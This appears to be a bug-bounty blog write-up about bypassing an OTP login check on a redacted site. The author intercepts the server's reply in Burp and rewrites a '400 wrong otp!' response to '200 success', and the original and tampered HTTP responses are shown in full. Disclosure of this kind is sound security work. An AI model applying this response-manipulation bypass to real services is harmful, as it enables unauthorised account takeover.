.png)
1 year ago
63 BOOK THIS SPACE FOR AD
ARTICLE ADHello everyone! I’m Nitish, hope you all are doing great. In this, I will share how I found Authentication Bypass.
Today, I’m sharing a vulnerability that I found a while ago, which I believe is quite interesting.
SUMMARY:
Authentication Bypass is a dangerous vulnerability that is found in Web-Applications. Attackers can bypass the control mechanisms which are used by the underlying web application like OTP, Captcha, 2FA, Email verification, etc. An Attacker can perform a complete Account takeover of the Victim.
Steps to Reproduce:
Step 1: Let’s consider my target is redacted.com go to the login page.
Step 2: Login Verification form will appear to enter the mail id and mobile number.
Step 3: In the OTP field enter the wrong otp and capture the request in burp.
Step 4: Then click the action button and intercept and forward the request.
Step 5: And a response will appear. In the response change
HTTP/1.1 400 Bad Request
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 02 Oct 2022 09:00:02 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 20
Connection: close
X-Powered-By: Express
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, PATCH, DELETE
Access-Control-Allow-Headers: X-Requested-With,content-type
Access-Control-Allow-Credentials: true
{“msg”:”wrong otp!”}
this to
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 02 Oct 2022 09:00:02 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 20
Connection: close
X-Powered-By: Express
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, PATCH, DELETE
Access-Control-Allow-Headers: X-Requested-With,content-type
Access-Control-Allow-Credentials: true
{“msg”:”success”}
Step 6: By this method, the attacker can bypass otp.
Step 7: And with this same response the attacker can bypass other phone numbers.
Impact :
An Adversary can carry out Auth Bypass attack and perform an Account Take Over.
Recommendations :
The application should protect sensitive actions and validate the verification process of the web application. Restrict the user from any malicious behavior.
That’s all, thank you very much for reading it till the last. Hope you would have enjoyed it.
Bengali (Bangladesh) · 
English (United States) ·